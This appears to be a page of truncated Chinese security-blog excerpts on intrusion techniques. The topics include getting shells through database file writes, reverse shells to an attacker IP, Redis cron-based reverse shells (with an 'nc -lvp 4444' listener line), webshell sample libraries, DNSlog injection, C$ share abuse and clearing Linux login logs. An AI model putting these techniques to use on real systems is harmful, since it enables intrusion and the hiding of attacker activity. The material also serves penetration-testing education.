在网络安全渗透测试中，通过数据库写入文件获取服务器 Shell 是一种常见且有效的攻击手段。这种方式的核心在于利用数据库的文件操作权限，将恶意脚本写入 Web 可访问目录，进而实现对服务器的控制。以下详细介绍几种主流的实现方式及操作细节。 核心前提条件 成功通过写入文件获取 Shell，需同时满足三个基础条件，缺一不可： 数据库最高权限：需拥有 M…

一、什么是反弹 Shell？ 在渗透测试中，当目标主机因防火墙限制、端口过滤等原因导致无法直接连接时，反弹 Shell 技术可让目标主机主动向攻击者控制的主机发起连接，从而建立交互式命令行会话。这是内网渗透中突破网络限制、获取持续控制权限的核心手段。 基础环境约定： 攻击者主机 IP：192.168.99.242 攻击者监听端口：1234（特殊场景…

随着 Docker、K8s 为代表的容器技术广泛普及，云原生环境的安全攻防已从单一容器逃逸升级为集群权限争夺 —— 拿下 K8s 集群管理员权限的影响，堪比传统网络中的域控失陷。无论是防守方的安全加固，还是攻击方的漏洞挖掘，都离不开专业工具的支持。本文整理了 10 款开源云原生安全工具，覆盖靶场搭建、漏洞利用、安全检测等核心场景，帮你全方位掌握云原…

在 Web 安全测试中，当遇到 SQL 注入但无法通过联合查询直接获取数据时，盲注往往是无奈之选。但手工盲注效率极低，自动化工具又可能因频繁请求被封 IP。此时，DNSlog 注入（DNS 带外查询） 作为一种巧妙的注入姿势，能通过 DNS 解析记录 “带外” 获取数据，成为突破困境的关键技术。本文将深入解析 DNS 注入的原理、工具与实战技巧。 …

在 Windows 系统中，C$共享是一种默认开启的 administrative 共享（管理员共享），主要用于系统管理员远程管理计算机。合理利用C$共享可实现文件传输、程序执行等操作，但同时也可能成为安全风险点。本文将从基础挂载到高级利用，全面解析 C$ 共享的操作方法与安全注意事项。 一、C$共享基础：什么是C$共享？ C$共享是Windows…

一、核心样本库推荐 1. 多语言综合样本库（5k + 星标） 项目名称：tennc/webshell 核心特点： 覆盖 10 + 脚本语言：ASP、ASPX、PHP、JSP、Perl、Python 等； 包含基础 “一句话”、管理型 WebShell（菜刀、冰蝎客户端）； 附带生成器、加密器等辅助工具。 适用场景：快速搭建测试库、WAF/IDS 识…

一、JWT 基础认知 1. 定义与结构 JSON Web Token（JWT）是一种基于 JSON 的轻量级身份验证令牌，用于在客户端与服务端之间安全传递声明信息，常见于单点登录（SSO）场景。 结构组成：由 3 部分通过.拼接，分别为： Header（头部）：Base64 编码的 JSON，包含令牌类型（typ: "JWT"）和签名算法（alg:…

1. Redis 未授权访问（默认端口 6379） 漏洞特征 默认无密码验证，允许匿名登录； 4.x/5.0.5 前版本支持通过主从复制加载恶意模块执行命令； 高权限运行时可写入系统文件（如计划任务、SSH 密钥）。 利用方式 计划任务反弹 Shell # 本地监听端口 nc -lvp 4444   # 连接目标Redis并写入任务 redis-c…

在网络安全领域，有些漏洞看似不起眼，却可能成为攻击者突破防线的关键。Host 碰撞（Host Header Attack）就是这样一种常被忽视却风险不小的漏洞。它不像 SQL 注入、XSS 那样广为人知，却能让攻击者绕过防护，悄无声息地访问到本不该被暴露的内部资源。今天，我们就来揭开 Host 碰撞的神秘面纱，从原理到防御，全方位搞懂这个漏洞。 一…

一、清除登录日志 登录日志是记录用户登录行为的核心凭证，需针对性清理各类日志文件及相关记录。 1. 核心日志文件及处理方式 （1）二进制日志（记录登录 / 注销及最后登录信息） /var/log/wtmp：对应 last 命令，记录所有用户登录、注销信息（二进制格式）。 处理方式：需用专业工具（如 Linux 登录日志修改脚本）解析二进制结构，精准…